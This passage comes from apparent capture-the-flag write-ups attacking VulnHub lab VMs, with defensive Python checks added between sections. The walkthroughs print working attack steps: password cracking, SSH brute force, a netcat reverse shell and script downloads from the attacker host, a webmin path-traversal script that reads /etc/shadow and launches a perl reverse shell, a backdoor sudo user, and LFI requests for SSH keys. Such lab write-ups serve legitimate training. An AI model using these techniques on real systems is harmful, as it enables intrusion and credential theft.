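        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte, skip it
            pos += 1
            continue
        if marker in (EOI, SOS) or 0xD0 <= marker <= 0xD7:
            break                   # standalone markers / start of scan data
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def comment_segments(data):
    """Raw payloads of all COM segments in the file (what exiftool shows as Comment)."""
    return [payload for marker, payload in jpeg_segments(data) if marker == COM]


def decode_if_base64(blob):
    """Return the decoded bytes if blob is plausibly base64, else None."""
    stripped = blob.strip()
    if len(stripped) < 16 or not B64_RE.match(stripped):
        return None
    try:
        return base64.b64decode(b"".join(stripped.split()), validate=True)
    except binascii.Error:
        return None


def hidden_base64_comments(data):
    """Decoded contents of every base64-looking comment segment."""
    found = []
    for payload in comment_segments(data):
        decoded = decode_if_base64(payload)
        if decoded is not None:
            found.append(decoded)
    return found


def build_jpeg_with_comment(comment):
    """Constructed minimal JPEG: SOI, one COM segment, EOI (no image data)."""
    segment = struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + b"\xff\xfe" + segment + b"\xff\xd9"


# Constructed sample: a password-hash-shaped string hidden in the comment.
SAMPLE_SECRET = b"someuser:$6$constructedsalt$PLACEHOLDERHASHVALUE"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SECRET)
SAMPLE_JPEG = build_jpeg_with_comment(SAMPLE_ENCODED)

if __name__ == "__main__":
    for secret in hidden_base64_comments(SAMPLE_JPEG):
        print("hidden comment:", secret.decode(errors="replace"))
```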
<div>
<br /></div>
<div>
ooohhh yeaaah... hash FTW!</div>
<div>
<br /></div>
<div>
Let's see if my crappy 590GTX still works with hashcat on my windows box. I copy the hash to file hash.txt and let hashcat rip on the sha512 hash using the rockyou wordlist; </div>
<div>
<span style="color: lime;">hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou.txt</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_zpshcrqdfq9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="412" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_zpshcrqdfq9.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Success! </div>
<div>
So user:password obtained;</div>
<div>
MeGustaKing:**********</div>
<div>
<br /></div>
<div>
Nice!</div>
<div>
<br /></div>
<div>
<b><i><span style="font-size: large;">SSH Fun / tr0lls.. </span></i></b></div>
<div>
======================</div>
<div>
Alright, but now we have what appear to be valid credentials in our hand! Shell seems within our grasp at last!</div>
<br />
Let's try our shiny new credentials on an ssh login;<br />
<span style="color: lime;">ssh MeGustaKing@192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_01_zpsjti5z7ol.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="384" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_01_zpsjti5z7ol.png" width="640" /></a></div>
<br />
What the... argh..<br />
Pfff...more tr0lls... hahaha... this guy..<br />
<br />
Well, there seems to be an encoded string at the top; however, try as I might, I could not decode the fucker. Later it turned out that there was actually a typo in it and that the correct string was;<br />
"<span style="white-space: pre-wrap;"><span style="color: yellow;">U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==</span>" </span><br />
<span style="white-space: pre-wrap;"><br /></span>
<span style="white-space: pre-wrap;">Decoding this twice with base64 results in flag number 6 (where the hell # 4 & 5 are hiding... I dunno lol, but possibly in the g4m35.ctf domain)</span><br />
<span style="white-space: pre-wrap;">FL46_6:FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag6_zpsinlxicn6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="124" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag6_zpsinlxicn6.png" width="640" /></a></div>
<br />
Moving on down the information in the ssh screen, there is a mention of a last login from R0cKy0U.7x7, which seems a fairly obvious reference to the rockyou.txt wordlist (but the last login is also mentioned as being on 01-04-2017.. April Fools' Day.. oh lordy)<br />
Also, there seems to be some alarm that the user logging in is not "burtieo", who apparently is the 54wltyD4w6..<br />
<br />
Well, armed with a new username and a clear reference to the rockyou wordlist, we fire up hydra and let her do her worst on an ssh bruteforce attack (well OK, chron1cl3 did this :P nice going dude :D)<br />
Running a bruteforce attack on an ssh login is a slow and painful process, and truly the only thing you can hope for is a good hint on the password or at least a smallish, focused wordlist.<br />
In this case the rockyou reference is pretty clear, so just have to let it run for as long as I can keep the PC on and see how far we get..;<br />
<br />
<span style="color: lime;">hydra -l burtieo -P lists/rockyou.txt -e nsr 192.168.56.102 ssh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hydra_ssh_zpscm9icnne.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="258" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/hydra_ssh_zpscm9icnne.png" width="640" /></a></div>
<br />
OK, so actually this was yet another tr0ll.. haha, the actual password was written right in the login screen...<br />
<br />
But no matter, now we have another set of shiny new credentials! Yay! or do we.. on initial logging in, all seems fine, but then..<br />
<span style="color: lime;">ssh burtieo@192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/rbash_zpso0dddx93.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="314" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/rbash_zpso0dddx93.png" width="640" /></a></div>
<br />
gah, it's an rbash restricted shell.. and try though I might, I was not able to easily escape this one..<br />
<br />
SSH allows a command to be passed on the command line for remote execution, which in this case can bypass some of the restrictions, although it still isn't terribly user friendly. We can test this with;<br />
<span style="color: lime;">ssh burtieo@192.168.56.102 cat /etc/passwd</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_zpsk1xya55g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="544" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_zpsk1xya55g.png" width="640" /></a></div>
<br />
OK, good, that works; let's see if we can turn this into a simple shell for ease of use;<br />
<br />
Start up a netcat listener, then start the ssh command calling a netcat connect command,<br />
spawn a cleaner shell, set the environment and get busy :D<br />
<div>
<br /></div>
<div>
<span style="color: lime;">ssh burtieo@192.168.56.102 nc 192.168.56.101 4444 -e /bin/sh</span><br />
<i>enter burtieo's password</i></div>
<span style="color: lime;">python -c 'import pty; pty.spawn("/bin/sh")'</span><br />
<span style="color: lime;">export TERM=linux</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_shell_zps17gnyinq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_uce_shell_zps17gnyinq.png" width="640" /></a></div>
<br />
Ahh, this is better! Looks like we are good to go and get on with further enumeration of the box.<br />
<br />
I change to the writable directory /tmp and, after checking that wget is installed, start apache2 on the attacking machine, host an enumeration script and then download and run it on the victim;<br />
<br />
<span style="color: lime;">cd /tmp </span><br />
<span style="color: lime;">which wget </span><br />
<span style="color: lime;">wget -q 192.168.56.101/linEnum.sh</span><br />
<span style="color: lime;">bash linEnum.sh > enum.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload_enum_zpsyekyi1hh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="392" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/upload_enum_zpsyekyi1hh.png" width="640" /></a></div>
<br />
Reading through the enumeration script results.. something immediately caught my eye..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sudo-l_zps8dbdllkp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/sudo-l_zps8dbdllkp.png" width="640" /></a></div>
<br />
To quote chron1cl3; "<i><b>oh shizzle!</b></i>" :D<br />
We can run a file as root, must be getting close now..<br />
<br />
When running the /usr/bin/wmstrt file, it counts down from 20 to 0 and then prints;<br />
<span style="color: yellow;">D1dyaCatchaT3nK1l0?</span><br />
<span style="color: yellow;">:D</span><br />
<div>
<br /></div>
We figured 10 kilo must be 10k / 10000, so ran a quick nmap scan during the 20 seconds of countdown time when running the wmstrt file with sudo;<br />
<span style="color: lime;">nmap -p 10000 -sV 192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_10k_zpsirhccrqo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="316" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_10k_zpsirhccrqo.png" width="640" /></a></div>
<br />
I was having real trouble with the browser not accepting the certificate and for all the googling on it the only solution I came across was downgrading the browser.. I was basically more or less giving up on it, but this is where some serious pimpness came into play in the form of <i>He Who Shall Not Be Named</i>.. otherwise known as ch3rn0byl..<br />
<br />
ch3rn whipped up a python script (don't you hate/love it when people just quickly do that while they're sitting on the john doing a crossword puzzle or some shit) which ignores SSL certificate verification and does a path traversal to be able to read files outside the web root directory.. in a few short lines...<br />
I've gotta loosen up with my bash love and get on this python bandwagon..<br />
<blockquote class="tr_bq">
import requests<br />
payload = '/..%01' * 10<br />
payload += '/etc/shadow'<br />
r = requests.get('https://192.168.56.102:10000/unauthenticated{}'.format(payload), verify=False)<br />
print r.url, r.status_code, r.reason, r.content</blockquote>
So we run the /usr/bin/wmstrt file with sudo to open up the webmin port 10000 and then run ch3rn's pimpscript;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pimp_shadow_zpsmxmpbve1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="392" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pimp_shadow_zpsmxmpbve1.png" width="640" /></a></div>
<br />
Success! For shits and giggles I grabbed the root hash and ran hashcat on it using rockyou wordlist.<br />
<span style="color: lime;">hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_hash_zpsxfgx7q6g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="436" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_hash_zpsxfgx7q6g.png" width="640" /></a></div>
<br />
no way.. really? More creds!<br />
<b>root:password</b><br />
<br />
In the 1st version, root was allowed to log in over ssh, which made access ezpz, but it was clear this was not the author's intended route, and in the revised VM the root login capability has been removed.<br />
<br />
I was sure (and so was ch3rn..) that his pimpscript could be used to get a file to run as root, and considering we had write access to /tmp, I wanted to create a reverse shell and then have it phone home after having been called by root, and thus give that sweet rootshell..<br />
<br />
My brain was frazzled, but ch3rnobyl came through again with some awesome tidbits on webmin. <i>Well tidbits.. I'm not too proud to avoid admitting there was a fairly pretty spoon involved.. :P</i><br />
So roughly, and this part will need some serious improvement when I get my game together on this: webmin is written in perl and runs perl scripts as CGI. So creating a perl script (changing the extension from .pl to .cgi) and making it executable will allow us to execute that file if it can be called/reached by path traversal via the webmin service.<br />
<br />
So first we prepare a perl reverse shell;<br />
/usr/share/webshells/perl/perl-reverse-shell.pl<br />
edit the IP and PORT to our setup and then host on our attacking system.<br />
<br />
Download it to the writable <b>/tmp/</b> directory on the target system, rename the extension (I renamed the shell revshell.cgi) and make it executable with chmod +x.<br />
<span style="color: lime;">cd /tmp</span><br />
<span style="color: lime;">wget -q 192.168.56.101/perl-reverse-shell.pl</span><br />
<span style="color: lime;">mv perl-reverse-shell.pl revshell.cgi</span><br />
<span style="color: lime;">chmod +x revshell.cgi</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/revshell_prep_zpsbxkixty5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="452" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/revshell_prep_zpsbxkixty5.png" width="640" /></a></div>
<br />
We edit the pimpscript to call the correct file. As there is no need to read the content or the like, we can delete some of the printed items, so I just left the url and status_code to be printed.<br />
<blockquote class="tr_bq">
import requests<br />
payload = '/..%01' * 4<br />
payload += '/tmp/revshell.cgi'<br />
r = requests.get('https://192.168.56.102:10000/unauthenticated{}'.format(payload), verify=False)<br />
print r.url, r.status_code</blockquote>
<div>
Start a netcat listener on the attacker, run webmin file /usr/bin/wmstrt with sudo again and in the 20 seconds run the pimpscript to call the perl reverse shell..</div>
<i>prep..</i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_prep1_zpsejbuj7zo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="570" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_prep1_zpsejbuj7zo.png" width="640" /></a></div>
<br />
<i><b>pwn..</b></i><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpslk2om5nb.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="594" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_zpslk2om5nb.png" width="640" /></a><br />
<br />
Oh.Fuck.Yes.<br />
<br />
<br />
So this is a pretty round-about way to get to root, so let's get another user in the mix straight away with root privs so we can finally get a normal friggin root shell;<br />
<br />
<span style="color: lime;">useradd -u 12345 -g root -s /bin/bash -p $(echo epat | openssl passwd -1 -stdin) tape</span><br />
<span style="color: lime;">echo "tape ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_user1_zpsxwhdoxph.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="334" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_user1_zpsxwhdoxph.png" width="640" /></a></div>
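From the defender's side, here is an added example (not the post's or the VM's code) that audits the two files touched by the commands above: it flags non-root accounts whose uid or primary gid is 0 and lists sudoers rules carrying NOPASSWD, which is exactly what a "tape"-style backdoor account leaves behind. Both file samples are constructed for the demo.

```python
import re

# Constructed samples modelled on the two changes made above; not the VM's real files.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
burtieo:x:1001:1001:burtieo:/home/burtieo:/bin/rbash
tape:x:12345:0::/home/tape:/bin/bash
"""

SUDOERS_SAMPLE = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
burtieo ALL=(root) NOPASSWD: /usr/bin/wmstrt   # constructed: targeted rule
tape ALL=(ALL:ALL) NOPASSWD:ALL
"""

# who  hosts = (runas) [TAG: ...] commands
SUDO_RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def suspicious_passwd_entries(text):
    """Accounts other than root that carry uid 0 or primary gid 0."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, _, _, shell = fields
        reasons = []
        if name != "root" and uid == "0":
            reasons.append("uid 0")
        if name != "root" and gid == "0":
            reasons.append("primary gid 0")
        if reasons:
            findings.append((name, shell, reasons))
    return findings


def nopasswd_rules(text):
    """(who, commands) for every sudoers rule that carries the NOPASSWD tag."""
    hits = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop trailing comments
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        if "NOPASSWD:" in m.group("tags").upper():
            hits.append((m.group("who"), m.group("cmds").strip()))
    return hits


def unrestricted_nopasswd(text):
    """Principals that may run ANY command without a password: the worst case."""
    return [who for who, cmds in nopasswd_rules(text) if cmds.upper() == "ALL"]


if __name__ == "__main__":
    for name, shell, why in suspicious_passwd_entries(PASSWD_SAMPLE):
        print("passwd:  %s (%s): %s" % (name, shell, ", ".join(why)))
    for who, cmds in nopasswd_rules(SUDOERS_SAMPLE):
        print("sudoers: %s -> NOPASSWD %s" % (who, cmds))
```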
<br />
Now we can log in with ssh and do a sudo su to get root privs, nice and ez!<br />
<span style="color: lime;">ssh tape@192.168.56.102 </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_tape_zpsxbfrdssv.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="426" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/ssh_tape_zpsxbfrdssv.png" width="640" /></a></div>
<br />
<span style="color: lime;">sudo su</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_tape_1_zpstppmvn5e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="222" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/root_tape_1_zpstppmvn5e.png" width="640" /></a></div>
<br />
So now we've got nice and ez root access. I'm gonna enumerate the bejeezus outta the g4m35.ctf domain and see if I can find flags 4 &amp; 5 :P but for a wee moment.. enough time spent on this and time for some THS R&amp;R! :P<br />
<br />
Think Chron1cl3 has pwned flag7, will update as and when progress is made ;)<br />
<br />
Big up to the THS crew and those participating in one way or another on this awesome VM<br />
Chron1cl3 -- <a href="https://twitter.com/chron1cl3" target="_blank">https://twitter.com/chron1cl3</a><br />
Ch3rn0byl<br />
Gr3yM4tt3r</div>
<br />
<br />
And of course many thanks to 3mrgnc3 for this great (and frustrating.. grr) ride and thanks to VulnHub for hosting these awesome VMs.<br />
<br /></div>
<b>VulnHub -- Pluck -- Writeup</b> (posted 2017-03-18, updated 2017-03-29)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b>Plucking Pluck</b><br />
<b>============</b><br />
<br />
I had a fun time going through Pluck; there were no tempting write-ups available at time of testing, so I managed to steer clear of the easy ways out ;)<br />
<br />
Firing up netdiscover, we find the host to target (which, I actually saw later, was conveniently mentioned in the actual Pluck VM login screen)<br />
<span style="color: lime;">netdiscover -i eth0 -P -r 192.168.110.0/24</span><br />
<span style="color: lime;">bash tools/ranger.sh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ranger_zpscgdcubs1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="328" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ranger_zpscgdcubs1.png" width="640" /></a></div>
<br />
With the target identified, the next stage is to see what a port scan probing open ports for service/version information reveals;<br />
<br />
<span style="color: lime;">nmap -sV -p - 192.168.110.102 2> /dev/null</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nmap_zpsgcb6mirc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nmap_zpsgcb6mirc.png" width="640" /></a></div>
<br />
OK, so ssh, http, mysql and an as-yet-to-be-determined service to poke around at.<br />
<br />
Going through the http pages, we see Home, About, Contact and Admin pages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_webpage_zpsx8syrslp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="564" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_webpage_zpsx8syrslp.png" width="640" /></a></div>
<br />
The Admin page has a login, however it requires an email address and I was not able to find any information on correct email address formats.<br />
Testing with various email formats did not get any helpful error message.<br />
<br />
I tried to get some helpful sql errors, and entering <span style="color: lime;">'</span> as the email address did result in;<br />
<i>"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6" </i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_admin-webpage_zpso5zucli2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="564" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_admin-webpage_zpso5zucli2.png" width="640" /></a></div>
<br />
I was unable to get any further so decided to leave that route for what it was for the time being.<br />
Not sure whether there is anything to be found with the sql in the login, will have to dig a bit more.<br />
<br />
<br />
<b>FORCED BROWSING</b><br />
With the hope of an easy entry fading, I checked if any easily identified files/directories could be found;<br />
<br />
<span style="color: lime;">dirb http://192.168.110.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_dirb_zpsvk8lg8sa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_dirb_zpsvk8lg8sa.png" width="568" /></a></div>
<br />
<span style="color: lime;">wfuzz -c -w /usr/share/seclists/Discovery/Web-content/big.txt --hc 404 192.168.110.102/FUZZ</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_wfuzz_zpsgib5pdsb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="340" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_wfuzz_zpsgib5pdsb.png" width="640" /></a></div>
<br />
Nothing interesting standing out..<br />
<br />
I actually even ran cewl on the 'About' page of the server and ran a forced browse attack using that custom wordlist, but also no dice.<br />
<br />
<b>SSH</b><br />
Port 22 was open, so I decided to run a bruteforce with the most common 10k passwords on ssh with username admin, as there appeared to be an admin login on http; you never know, right?<br />
<div>
<span style="color: lime;">hydra -l admin -P /lists/10k.txt -e nsr -t 4 -Vf 192.168.110.102 ssh</span> </div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ssh-hydra_zpsw2rnkkmi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="372" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_ssh-hydra_zpsw2rnkkmi.png" width="640" /></a></div>
<br />
Predictable outcome though; no dice.<br />
<div>
<br /></div>
<b>MYSQL </b><br />
Trying a mysql login turned out to be a no-go as well..<br />
<span style="color: lime;">mysql -h 192.168.110.102 -uroot -ptoor</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_mysql_zpsj7ge0acd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="154" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_mysql_zpsj7ge0acd.png" width="640" /></a></div>
<br />
pfff... things were beginning to look a little bleak..<br />
<br />
<br /></div>
<div>
<b>MY SAVIOUR: NIKTO</b><br />
Running nikto showed an interesting LFI vulnerability, allowing viewing of any file on the target.</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/saviour_zpso4ly4ct6.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/saviour_zpso4ly4ct6.jpg" width="640" /></a></div>
<br /></div>
<div>
<span style="color: lime;">nikto -h 192.168.110.102</span></div>
<div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nikto_zps2igydyxw.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="476" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_nikto_zps2igydyxw.png" width="640" /></a></div>
<div>
<br />
Checking the LFI vulnerability with curl indeed showed the file.. </div>
<div>
Finally.. progress!<br />
<span style="color: lime;">curl -s 192.168.110.102/index.php?page=../../../../../../../../../../etc/passwd</span></div>
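As an added example (not from either write-up), here is the check a file-serving handler should be making, written in Python and covering both the <span style="color: lime;">/..%01</span> style traversal used against webmin earlier and Pluck's <span style="color: lime;">page=../../</span> include: a naive substring filter next to a decode, canonicalize and confine check, plus the allowlist approach that avoids building a path from user input at all. The document root and page names are assumed for the demo.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"                               # assumed document root
ALLOWED_PAGES = {"home", "about", "contact", "admin"}    # assumed allowlist for ?page=


def naive_is_safe(path):
    """Substring filter for '../' only; the kind of check that misses
    URL-encoded (..%2f) or decorated (..%01) variants of the same thing."""
    return "../" not in path and "..\\" not in path


def resolve_under_root(root, requested):
    """Decode, canonicalize and confine a request path to root.
    Returns the absolute path, or None if it escapes or is malformed."""
    decoded = unquote(requested)
    # Control characters (the %01 in the webmin payload, NUL, ...) never belong
    # in a legitimate filename; refuse them outright instead of "cleaning" them.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in decoded):
        return None
    root_abs = posixpath.normpath(root)
    # Lexical normalisation collapses every '..'; a real server should also run
    # os.path.realpath() on the result so a symlink cannot re-escape the root.
    candidate = posixpath.normpath(posixpath.join(root_abs, decoded.lstrip("/")))
    if candidate != root_abs and not candidate.startswith(root_abs + "/"):
        return None
    return candidate


def select_page(name):
    """Allowlist alternative to include($_GET['page']): map a name to a file,
    so user input never becomes a path component in the first place."""
    if name not in ALLOWED_PAGES:
        return None
    return posixpath.join(WEB_ROOT, name + ".php")


if __name__ == "__main__":
    probes = [
        "about.php",
        "../../../../etc/passwd",          # Pluck-style LFI
        "..%2f..%2fetc/passwd",            # URL-encoded dots and slashes
        "/..%01/..%01/etc/shadow",         # webmin-style decorated traversal
    ]
    for p in probes:
        print("%-28s naive=%-5s strict=%s"
              % (p, naive_is_safe(p), resolve_under_root(WEB_ROOT, p)))
```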
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_1_zps7sel4yg3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="612" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_1_zps7sel4yg3.png" width="640" /></a></div>
<br /></div>
<div>
<br />
OK, looks like there may be a backup file to poke at..<br />
<br />
Let's see if we can download the backup file; despite the mention of tftp, I just tried with curl, and man, the download just kept on going.. at 2GB I cancelled the download in the hope that something could be extracted..<br />
<br />
<span style="color: lime;">curl 192.168.110.102/index.php?page=../../../../../../../../../../backups/backup.tar > backup.tar</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_tar_zpswx08tqkd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="114" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_curl_tar_zpswx08tqkd.png" width="640" /></a></div>
First I did a manual check to see if a quick scroll through the first few hundred lines had anything jumping out, and something did..!<br />
<span style="color: lime;">cat backup.tar | head -n 500 | less</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_rsa-ssh_zpsauq3bjha.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="338" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/pluck_rsa-ssh_zpsauq3bjha.png" width="640" /></a><br />
<br />
hmm.. user paul and ssh rsa keys? Looking more promising now!<br />
<br />
Some handy information which google was kind enough to cough up for me;<br />
<a href="https://support.rackspace.com/how-to/logging-in-with-an-ssh-private-key-on-linuxmac/" target="_blank">https://support.rackspace.com/how-to/logging-in-with-an-ssh-private-key-on-linuxmac/</a><br />
<div>
<br /></div>
You could sed out the RSA key ( <span style="color: lime;">sed '0,/BEGIN RSA PRIVATE KEY/d;/END RSA PRIVATE KEY/,$d' backup.tar</span> ) and add the BEGIN and END strings, or just be lazy and Select, Copy and Paste..<br />
